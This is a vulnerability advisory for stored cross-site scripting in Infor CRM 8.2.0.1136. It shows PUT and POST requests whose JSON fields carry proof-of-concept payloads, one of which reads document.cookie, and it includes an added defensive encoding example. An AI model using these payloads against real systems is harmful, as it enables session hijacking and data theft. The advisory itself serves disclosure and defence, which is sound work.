Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities


Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136

Summary: Infor® CRM, formerly Saleslogix, is an award-winning customer
relationship management (CRM) solution that provides a complete view of
customer interactions, so your business can collaborate and respond
promptly and knowledgably to customer inquiries, sales opportunities,
and service requests. Infor CRM includes a robust suite of sales,
marketing, and service capabilities, to offer businesses of all sizes a
fast, flexible, and affordable solution for finding, winning, and
growing profitable customer relationships.

Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in JSON
format is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in the context of an affected site.

Tested on: Microsoft-IIS/8.5
           ASP.NET/4.0.30319


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php


21.01.2016

---


----------------------------------
Affected parameter(s): description
----------------------------------

PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk

{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}

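
Added example, not part of the original advisory and not Infor code: the description value in the request above is stored and later returned to the browser unencoded. The JavaScript below walks an SData-style JSON entity, reports which string fields carry markup, and HTML-encodes values before rendering; the function names and the sample record are constructed for illustration.

```javascript
// Added example, not Infor CRM code. Names and sample data are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Heuristic for stored markup: a tag opener or an inline event handler.
const MARKUP = /<\s*\/?\s*[a-z!][^>]*>|\bon[a-z]+\s*=/i;

// Walk an entity recursively and return the dotted paths of string values
// that contain markup, so stored records can be audited and cleaned.
function findMarkup(entity, prefix = '') {
  const hits = [];
  for (const [key, value] of Object.entries(entity || {})) {
    const path = prefix ? `${prefix}.${key}` : key;
    if (typeof value === 'string') {
      if (MARKUP.test(value)) hits.push(path);
    } else if (value && typeof value === 'object') {
      hits.push(...findMarkup(value, path));
    }
  }
  return hits;
}

// Return a deep copy with every string value HTML-encoded for rendering.
function encodeForRender(entity) {
  if (typeof entity === 'string') return escapeHtml(entity);
  if (Array.isArray(entity)) return entity.map(encodeForRender);
  if (entity && typeof entity === 'object') {
    return Object.fromEntries(
      Object.entries(entity).map(([k, v]) => [k, encodeForRender(v)]));
  }
  return entity; // numbers, booleans, null pass through unchanged
}

// Constructed sample modelled on the attachment fields shown in the advisory.
const sampleAttachment = {
  $key: 'eUSERA0004IX',
  description: '<img src=j onerror=confirm(document.cookie) >',
  details: { createSource: null },
  fileName: 'inforcrm_xss.png',
  fileSize: 101722,
  user: { $key: 'UUSERA0005W0' },
};

console.log(findMarkup(sampleAttachment));
console.log(encodeForRender(sampleAttachment).description);
```

Encoding belongs at the point where the value is written into the page; the audit function is only a way to find records that already hold markup.
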
-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------

POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk

{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
  ChangeKey: null
  CreateSource: null
  ForeignId1: null
  ForeignId2: null
  ForeignId3: null
  ForeignId4: null
  GlobalSyncId: null
  ProjectId: null
  Tick: null
  UserDef1: null
  UserDef2: null
  UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
  $descriptor: "Userovich, User"
  $key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
  $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
  $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"